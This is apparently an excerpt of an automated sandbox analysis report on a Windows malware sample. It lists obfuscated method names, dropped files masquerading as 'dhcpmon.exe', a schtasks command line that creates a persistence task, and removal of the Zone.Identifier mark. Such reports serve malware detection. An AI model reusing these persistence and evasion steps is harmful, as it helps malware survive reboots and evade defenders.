        Source: 6.0.U7Ncg7oAyC.exe.400000.4.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 6.0.U7Ncg7oAyC.exe.400000.10.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 6.0.U7Ncg7oAyC.exe.400000.10.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 6.0.U7Ncg7oAyC.exe.400000.12.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 6.0.U7Ncg7oAyC.exe.400000.12.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 6.0.U7Ncg7oAyC.exe.400000.8.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 6.0.U7Ncg7oAyC.exe.400000.8.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 6.0.U7Ncg7oAyC.exe.400000.6.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 6.0.U7Ncg7oAyC.exe.400000.6.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 6.2.U7Ncg7oAyC.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 6.2.U7Ncg7oAyC.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 30.0.U7Ncg7oAyC.exe.400000.6.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 30.0.U7Ncg7oAyC.exe.400000.6.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeFile created: C:\Users\user\AppData\Roaming\LYKZypsugb.exeJump to dropped file
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeFile created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJump to dropped file

        Boot Survival

        barindex
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LYKZypsugb" /XML "C:\Users\user\AppData\Local\Temp\tmp43AF.tmp

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeFile opened: C:\Users\user\Desktop\U7Ncg7oAyC.exe:Zone.Identifier read attributes | delete
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
